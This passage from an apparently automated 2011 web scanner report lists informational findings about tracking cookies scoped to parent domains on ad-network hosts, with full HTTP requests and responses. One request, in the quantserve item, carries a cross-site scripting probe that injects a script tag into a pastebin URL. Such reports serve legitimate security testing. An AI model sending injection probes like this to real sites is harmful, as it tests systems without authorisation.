hdKu0ByWZy+KTL1v/OQpmY1nftZfGOHQjKSF2P1zTGfEpRqL2kw=="; rsi_segs_1000000=pUPNfcPG7hMUFmJSL/a6Tc2cVgtigl9iBC1EXVoovPAwnmKsOWQJ/ULPGqLC16G0T17iRicC5KARkwTsTN8ioePPguoJ741/DK1Cmzf3MeNCyP1GEAb//VXLu/54y0XW2Qc7M45GdUJiNdjHq/ZtHS6Ghn8KrCU4potT0MwJAi0TACPm038iu2F90zRFvW2tyQA=; rtc_ac8M=MLuBq44HAVpDE1RBdcKRB7ZxEIAJXzMpNIiX6/DkPUHnRwu1INU7YESuLkV5mBhoj5Zf1jVUOEA+YtTPI8JufG/Cre49XXYBRXzYUblcveQ2ugG0KGJ2zDaCaA59xBUJAUsWH2wHE3djRDcpNER26fldZTABDtd4uTBdzX9g62NQniwGxHVABktEbzdrInhjUjr8DeZHE2mPTEUo; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39VEJbipn5t4pnpAaFXny/BhBCiFsbAsAnLzSYTlgg0qTOJ+Mg3DlTMEXAQTOD+7Yub7r0vZBjStqSHp0DWUhACTwZ3EiouT1cmm7wklDaOK/14Aj81c0EIOAjVSJNQ3/EJasmJU7rIdacNN0Suber3u8hlyARHsvpr0/LOSJS6bFYRSzZNKzSNQAzR12RlrciVdiZGvbIO0IrHQN6IZ5RFd0d+GqL8fZiTJZzaFjB+mKwrW9Wtwfhvi6ZzgvwXVFc+8JUgmysmlVasU4dDPRH48UbqWeyhogknLvpE7T0uymnntOnjnUXYFW/gUDr4tsrPjdAj+g49LnF7JczoY0qriSWVTmX/9B5mXyqikERRR7Wk7BtStxYE6DJh0PbDCcxaExS8LGEDu8qSMID8Jwyb+Wm4s0zH0JSE0XV2nhS+EsFzU0qn7qYVG23LOB5WEU5xepu5cA0xJ15e1tB8J0GRlXzkb1KB1wlRBGbef7TwTAltx9qrUQVr1AuDuQX3A2xbSkLeLGxARQdRtsBmY05cVPkBSIV+Ssvkd96r0ZhIBj/lNu8kK8QaokX0MDpeEz1F0u2r7Zz49jYSa3dq+PqSLFM1ySnu9PCyy02UBe92k9yjvyGFIH4lJT7rLmIikjqCRY7GUquZfOvqj/aBChSK1DHpMhLWCDF9rXnxOpnedFSOU6h5luF/mpBF2BtCkXKBeorKv7uk3WitFqzV0IC9C9BgWCUuGYfxFUgsaY2A6YyhSXKh7JqmH7Z2Twza28z3IU4s0pNAp8HN1BpbB/X82OpsvUtU9bmLPStjKw/l0cG+hCVLfXNEztRuMAXnSlSjgVHLN603CKv7wJcZ0a/VW8Og0VckJS3ggd3pkXtDl6sJAZyl8giiba1xEYmHGvdZOt4P5CUOc/cgqc3kEWkbycO4mTQjBUqxR65jDm+aIZ24qdnNdfSouAtwoNLfZUrmJJfoO04g2sewVltiFk6CJ9OrVqxL8g/cQ5sMLgAN9nx/vu1w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ac8M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_d1yn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UHo_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOUnFbnIQVp3RUOz/VGQbp+XT5PhqGi77X3Z4RpparcWHKeV86Lli0TAjp7sD2wsNjeiiHejHOOvj0jdLCjKDn6QOlaUki40+l7YGOxttCDhojwZFfSdbSG6auv+NtQaLeK6yjaSOcn/tIVqutnj5ehklArgmMZQWDPA+LFxsMUIfDd8xp54waV696ckFp0yQyokMqd9T2L+UDYdqcGpMN/s2So1wlKDU/Revqkw6Wg==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:26:15 GMT; Path=/
Set-Cookie: NETSEGS_G07608=82f4957c1a652091&G07608&0&4df56737&4&10004,10009,10016,10017&4dcf3a10&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 13-Jun-2011 01:26:15 GMT; Path=/
Set-Cookie: rtc_ErQC=MLuBq44HAVpDE1RBdcKRB7ZxEIAJXzMpNIiX6/DkPUHnRwu1INU7YESuLkV5mBhoj5Zf1jUufJX42H6lKalhpctVQdkk4LWk10paZnCbr7pphQVva5XAHuMOfH7hyPpHBVYDsCDk9EsrB0ZgEAryJ99wLm75fG8zGQ5teImxCmKodBhXEA8k31zoz1YZt65mkSjxQo3twQuAEERdUBJzh5UdZw6wo7xveqZ3lm3WEmujdRpphTE3a9snWeE7MQjvo/mrpri5/KWuJu3royXntZOFYaAOqPyMa1fhvwito9Fk4RzmKcPrO+rku7aj4KKnIu78UXRDpm9lVsN+mg==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:26:15 GMT; Path=/
X-Proc-ms: 41
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:15 GMT
Content-Length: 729

/* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */
rsinetsegs=['J06575_50735','J06575_50822'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...

15.55. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1305398110461; Domain=.33across.com; Expires=Tue, 15-May-2012 01:29:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dce8a530508b02d HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1305398110461

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1305398110461; Domain=.33across.com; Expires=Tue, 15-May-2012 01:29:35 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 01:29:34 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

15.56. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dp_rec="{\"3\": 1305509220+ \"2\": 1305508826}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:27:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=9 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exchange_uid="eyI0IjogWyJDQUVTRUJMNlFmRmRPWkJGdXdLdHI0bVhjeWMiLCA3MzQyNzJdfQ=="; uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; segments_p1="eJzjYuGYNZmRi4VjxzoQueU/ExczR1cmADyqBZU="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:27:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 16-May-2011 01:26:40 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"3\": 1305509220+ \"2\": 1305508826}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:27:00 GMT; Path=/
Content-Length: 512

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4316443142505&PixelID=186","javascr
...[SNIP]...

15.57. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1305510050; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:40:50 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=101281&mt_adid=100230&v1=&v2=&v3=&s1=&s2=&s3=&ord=1269674253 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3761435560882.0913?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305510033

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x4 pid 0x4128 16680
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:40:50 GMT
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305510050; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:40:50 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

15.58. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=ENQBWwHgBoHyDhmtEqlQq8GBuGECniAAEIqhehgQc4EXMMs4H1cgMFgbEGCoNa_yEQA; expires=Sat, 13-Aug-2011 21:31:35 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=2010864181;fpan=0;fpa=P0-1057372372-1305495057638;ns=0;url=http%3A%2F%2Fpastebin.com%2Ffavicon.ico50732%2522%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253Ed0c46a64a0;ref=http%3A%2F%2Fburp%2Fshow%2F3;ce=1;je=1;sr=1920x1200x24;enc=n;ogl=title.Pastebin%252Ecom%20Unknown%20Paste%20ID%2Curl.http%3A%2F%2Fpastebin%252Ecom%2Ffavicon%252Eico50732%5C%2Cimage.http%3A%2F%2Fpastebin%252Ecom%2Fi%2Ffb%252Ejpg%2Csite_name.Pastebin;dst=1;et=1305495094730;tzo=300;a=p-306sOjcgY0NWo HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/favicon.ico50732%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed0c46a64a0
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EOYBWQHgBoHyDhmtEqlQq8GBuGECniAgiqF6GBBzgRcwyzgfVyAwWBsQYKg1r_IRAA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/pixel?pixelID=11262&partnerID=77&clientID=1769&key=segment&pb=0
Set-Cookie: d=ENQBWwHgBoHyDhmtEqlQq8GBuGECniAAEIqhehgQc4EXMMs4H1cgMFgbEGCoNa_yEQA; expires=Sat, 13-Aug-2011 21:31:35 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 15 May 2011 21:31:35 GMT
Server: QS

15.59. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=5671%3D1%264212%3D1; expires=Wed, 15-Jun-2011 01:26:19 GMT; path=/; domain=.rubiconproject.com
put_1185=4325897289836481830; expires=Fri, 15-Jul-2011 01:26:19 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=4325897289836481830&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3746342843808454987&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=154dd07bb6adc1d6f31bfa10^1^1305508790^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=5671%3D1; rpx=5671%3D11993%2C0%2C1%2C%2C; put_2081=AG-00000001389358554; rdk=4462/5032; ses2=5032^1; csi2=3179363.js^1^1305508799^1305508799&3158416.js^1^1305508790^1305508790

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:26:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5671%3D1%264212%3D1; expires=Wed, 15-Jun-2011 01:26:19 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5671%3D11993%2C0%2C1%2C%2C%264212%3D11993%2C0%2C2%2C%2C; expires=Wed, 15-Jun-2011 01:26:19 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=4325897289836481830; expires=Fri, 15-Jul-2011 01:26:19 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

15.60. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=5671%3D1; expires=Wed, 15-Jun-2011 01:19:53 GMT; path=/; domain=.rubiconproject.com
put_2081=AG-00000001389358554; expires=Wed, 15-Jun-2011 01:19:53 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5671&nid=2081&put=AG-00000001389358554&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=154dd07bb6adc1d6f31bfa10^1^1305508790^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=4462/5032; rdk2=0; ses2=5032^1; csi2=3158416.js^1^1305508790^1305508790

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5671%3D1; expires=Wed, 15-Jun-2011 01:19:53 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5671%3D11993%2C0%2C2%2C%2C; expires=Wed, 15-Jun-2011 01:19:53 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2081=AG-00000001389358554; expires=Wed, 15-Jun-2011 01:19:53 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

15.61. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Wed, 15-May-2013 01:26:09 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=4325897289836481830 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3746342843808454987&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; p=1305468109

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:26:09 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Wed, 15-May-2013 01:26:09 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

15.62. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:26:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=54&cver=1&uid=3420415245200633085 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3746342843808454987&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc; rrs=1002%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7Cundefined%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15110%7C15110%7C15110%7C15110%7Cundefined%7C15110%7C15110%7Cundefined%7C15110%7C15110%7Cundefined%7C15110%7C15110%7C15110%7Cundefined%7C15110%7Cundefined%7Cundefined%7C15110; rv=1; uid=4325897289836481830

Response

15.63. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Fri, 11-Nov-2011 20:26:57 GMT; Path=/
pf=_fnFNfxp6XXik7nKu4JYZXvBE_lJcdumADu2POSRW-K5QG0T3QdNjoLPr0l2V7ELxe7lCMMXT0t9dxMKVzXHibDu0nk6ZTWCqQw2ls2jDUXOWLK9LcPGmShBm337QwSVEHzKXHq15ooP7FoZYLBJ5WdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XLnXcQqmi33jxb-IIKkZs6gPsjBgp0yvPG-lT8pkb3Wd; Domain=.turn.com; Expires=Fri, 11-Nov-2011 20:26:57 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=FLmRqLwqYa5I0YQbvMbB3EJ08L1LAeFYPGApwxPekgtvzowi2ma1GoGp3jhwOQRSGl2V4RtfMhqgL9nzj79Usg&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://sony.links.channelintelligence.com/pages/prices.asp?nrgid=1864&ssku=98285
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; pf=j9tCwElDbZnXmBEvuU2UR3QhWonTYaWAo9eW0i2BvXrXz_dIuRqU5afNgLAlmfbojQlTvjTygqq5bkvm6dKpyoT02bCHN4Un3VqLILKCS2R6GX1zUztoZRz_GUAagegfdAnQ68KEdrRA38cOHIz3-Ekr20G7YEb8OrZUcGVpw6C4bwkwt3ReLkmGNFISVoVe

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Fri, 11-Nov-2011 20:26:57 GMT; Path=/
Set-Cookie: pf=_fnFNfxp6XXik7nKu4JYZXvBE_lJcdumADu2POSRW-K5QG0T3QdNjoLPr0l2V7ELxe7lCMMXT0t9dxMKVzXHibDu0nk6ZTWCqQw2ls2jDUXOWLK9LcPGmShBm337QwSVEHzKXHq15ooP7FoZYLBJ5WdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XLnXcQqmi33jxb-IIKkZs6gPsjBgp0yvPG-lT8pkb3Wd; Domain=.turn.com; Expires=Fri, 11-Nov-2011 20:26:57 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 15 May 2011 20:26:57 GMT

GIF89a.............!.......,...........D..;

15.64. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/
rrs=1002%7C1; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/
rds=15110%7C15110; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc; uid=4325897289836481830; rrs=1; rds=15110; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/
Set-Cookie: rrs=1002%7C1; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/
Set-Cookie: rds=15110%7C15110; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/
Content-Length: 0
Date: Mon, 16 May 2011 01:19:58 GMT

15.65. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

